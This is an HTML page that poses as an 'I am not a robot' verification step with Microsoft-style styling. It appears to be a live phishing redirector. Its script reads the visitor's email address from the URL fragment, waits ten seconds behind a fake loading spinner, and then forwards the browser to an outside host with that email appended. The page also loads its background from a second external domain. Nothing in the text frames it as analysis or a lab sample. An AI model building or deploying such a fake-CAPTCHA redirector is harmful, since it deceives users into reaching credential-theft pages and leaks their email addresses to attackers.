<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Redirecting...</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-image: url('https://horizon.sologerg.com/ghXV6wt9mkYFUOVIvXqDLY9LtHGdZrMcgIppPbwGyPFCmni62FkrSLfHBijlrb8ef');
            background-size: cover;
            background-position: center;
            margin: 0;
            padding: 0;
            display: flex;
            align-items: center;
            justify-content: center;
            height: 100vh;
        }
        .container {
            text-align: center;
        }
        .loading {
            display: none;
            margin-top: 20px;
        }
        .spinner {
            width: 30px;
            height: 30px;
            border: 3px solid rgba(0, 0, 0, 0.1);
            border-left-color: #0078D4; /* Microsoft blue color */
            border-radius: 50%;
            animation: spin 1s linear infinite;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body>
<div class="container">
    <img src="https://live.staticflickr.com/65535/53528767351_9260ea8cae_m.jpg" alt="Human verification" style="width: 100px; height: auto;">
    <form id="verificationForm" method="POST">
        <label for="verify">I am not a robot</label>
        <input type="checkbox" id="verify" name="verify">
        <br><br>
        <button type="submit">Submit</button>
        <div class="loading" id="loadingIndicator"><div class="spinner"></div></div>
    </form>
</div>
<script>
    document.getElementById('verificationForm').addEventListener('submit', function (event) {
        event.preventDefault();
        if (document.getElementById('verify').checked) {
            document.getElementById('loadingIndicator').style.display = 'block';
            document.querySelector('button[type="submit"]').setAttribute('disabled', 'true');
            setTimeout(function () {
                var email = window.location.hash.substring(1);
                window.location.href = 'http://tredsencux.ch' + encodeURIComponent(email);
            }, 10000);
        } else {
            alert('Please verify that you are a human being by ticking the checkbox.');
        }
    });
</script>
</body>
</html>


